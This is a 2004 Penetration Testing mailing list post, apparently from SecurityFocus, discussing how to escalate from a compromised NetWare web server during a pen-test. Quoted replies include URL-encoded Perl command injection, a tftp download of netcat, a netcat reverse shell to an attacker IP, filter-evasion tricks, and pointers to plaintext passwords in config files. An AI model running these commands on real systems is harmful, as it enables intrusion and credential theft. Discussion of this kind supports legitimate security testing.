Penetration Testing mailing list archives
Re: Escalating from Netware box
From: Francois Labreque <flabreq () ca ibm com>
Date: Mon, 23 Aug 2004 11:28:20 -0400
"Dave Nuull" <gotodevnull () hotmail com> wrote on 2004-08-15 12:02:35:
McKenna Henage or Beme Lee wrote:
I'm wrapping up a pen-test and I've gained access to a NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl commands using specially crafted URLs (e.g., "perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts
the
URLs to allow me to easily read any file on the server, write to any
file,
or execute any command. However, without any Novell experience (I am a
MS
and Linux guy), I am unable to escalate to the point of being able to attack other systems on the client's network.
Aside question: If perl -e is a command line option, why does a simple
'dir'
not work? Or a cmd%20/C%20dir?
Because "dir" does not work on a Novell server. Nor does "CMD.EXE". Novell servers run their own OS.
Any suggestions for ways I can use this Netware box to further exploit their networks would be very much appreciated. In particular, I'm interested
in
discovering what other devices are on their network (since I can only
see
their Netware box from the Internet), performing port scans,
vulnerability
scans, etc. I need to be nice to the server since it is in production,
so
I'm trying not to experiment too much on their machine and risk
bringing it
down (already crashed it once!).
If you can execute on the remote server, and if there are any 'closed'
ports
(i.e not filtered) then have you tried to tftp up a nc.exe and shovel a shell back to your attack host? i.e. "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);" "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"
You would have to send an .NLM - The Novell executable format - Win32 or DOS .EXE formats do not run on Netware.
If as you say below you cant find the tftp client, what about perl's FTP module: This one does not contain any " or ' chars so you could echo all the
lines
into a file on the remote server and run from the command line.
use Net::FTP; $ftp=Net::FTP->new($ARGV[0]); $ftp->login($ARGV[1],$ARGV[2]); $ftp->binary(); $ftp->get($ARGV[3]); $ftp->quit();
I've already done some research on Netware, including listening to
RFP's
Black Hat talk on Netware, and reading the "Novell Hacking FAQ"
available
on the web. Unfortunately most resources I've found refer to Netware 2.x,
3.x,
and 4.x. Here is what I've been able to gain so far, thanks to having partial access to files on the system using directory traversal:
If you have partial access to files (i.e at least read access), could
you
not tftp complete files back to your attack host?
There is usually no TFTP client on a Netware server. He said he could read the files in a browser.
This again assumes they have not configured restrictive outbound filtering on their firewall. If you can find their internal mail server, you could craft some SMTP commands and mail them to yourself instead :-)
Assuming he can use the Perl command interface on the Netware server to connect to the SMTP server.
-Internal IP address -IPX servers (running the command display ipx servers) -See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg (and to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW) -Successfully ping out to a device on the Internet (unfortunately it appears to be continuous, because I wasnt able to stop it) - and pretty much anything else that is in a file, or almost any
command
I have run into some limits: -Any request I make (to read/write a file or execute a command) is
limited
in character length, hampering my ability to execute an elaborate Perl program on the box or even to read some files that are too far down the directory tree
If you have a command length limits, perhaps try to create a .bat file
on
the remote server using echo appends and splitting the command into
smaller
sections. "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);" "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);" "perl/-e%20system(%22mycmd.bat%22);"
.BAT files do not work on Netware servers. He could create an .NCF which is basically the same thing as a .BAT but is limited to the commands that you can execute from the server prompt.
-Haven't found a way to send some characters such as " and ', even
after
trying everything I could think of (encoding, double encoding, etc.).
Wish
I could do that because then I could essentially start writing a new Perl script to their machine and overcome the character limitation just mentioned, and potentially find a way to upload a Perl port scanner of
some
sort.
If you have perl interpreter access, you could use the pack/unpack
functions
to decode the " or ' chars into decimal/hex/octal and using one liners unpack the chars on the remote host. ref: ascii chart for char->hex
values
i.e. C:\>perl -e $a=pack(H6,222027);print$a; " '
-An inability to correctly view all files. Since I'm getting the files
fed
back in a web browser, I can sometimes only see the first parts of a
file
(up to 500K or so), and have trouble downloading binaries. -An inability to see the entire results of a command run on the system.
I
can run a command, but then to see the results I have to open /etc/console.log and read the last few lines (so I can't always see the entire results, because it appears to be cut off in the log).
Do command output redirections into your own log file not work on the server?
Exactly. On a Netware server, if CONLOG.NLM is running ALL command output is duplicated in etc/console.log, if CONLOG.NLM is not running then the output will only appear on the server's physical console. There is a way to change the size of /etc/console.log at the command line, so you could unload CONLOG and LOAD CONLOG with the proper parameter so that you get a couple of MBs of logs.
-I dont even know how to download files to the Netware box. I have
been
unable to determine if it has a HTTP or FTP client I can use to pull
down a
trojan/backdoor program, netcat, or anything else. -Some blockage at the firewall (?). For example, I tried loading the
remote
console and then accessing it remotely, but it appears to be blocked at
the
firewall since I cant get in. If it were a Linux/Unix/Windows box then
Id
know how to download a SSH client and reverse-tunnel a connection out through the firewall, but Im clueless on Netware. Thanks in advance for any suggestions you can provide in the next
couple
days. Beme Lee
[Hotmail spam snipped.] ___________________________________________________ François Labrèque, CCNP Technical Leader, Network Support IBM Global Services Tel.:(514)-964-2150 Fax.:(514)-964-1708 flabreq () ca ibm com In the future, performance will be measured by the size of your pipe! - Dogbert, on networking ------------------------------------------------------------------------------ Ethical Hacking at the InfoSec Institute. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. Check out our Advanced Hacking course, learn to write exploits and attack security infrastructure. Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. Master the skills of an Ethical Hacker to better assess the security of your organization. http://www.securityfocus.com/sponsor/InfoSecInstitute_pen-test_040817 -------------------------------------------------------------------------------
Current thread:
- Escalating from Netware box McKenna Henage (Aug 12)
- RE: Escalating from Netware box Jerry Shenk (Aug 16)
- <Possible follow-ups>
- Re: Escalating from Netware box Dave Nuull (Aug 16)
- Re: Escalating from Netware box Francois Labreque (Aug 23)
- RE: Escalating from Netware box Steven A. Fletcher (Aug 16)
- RE: Escalating from Netware box Smarsz, Michael (Aug 16)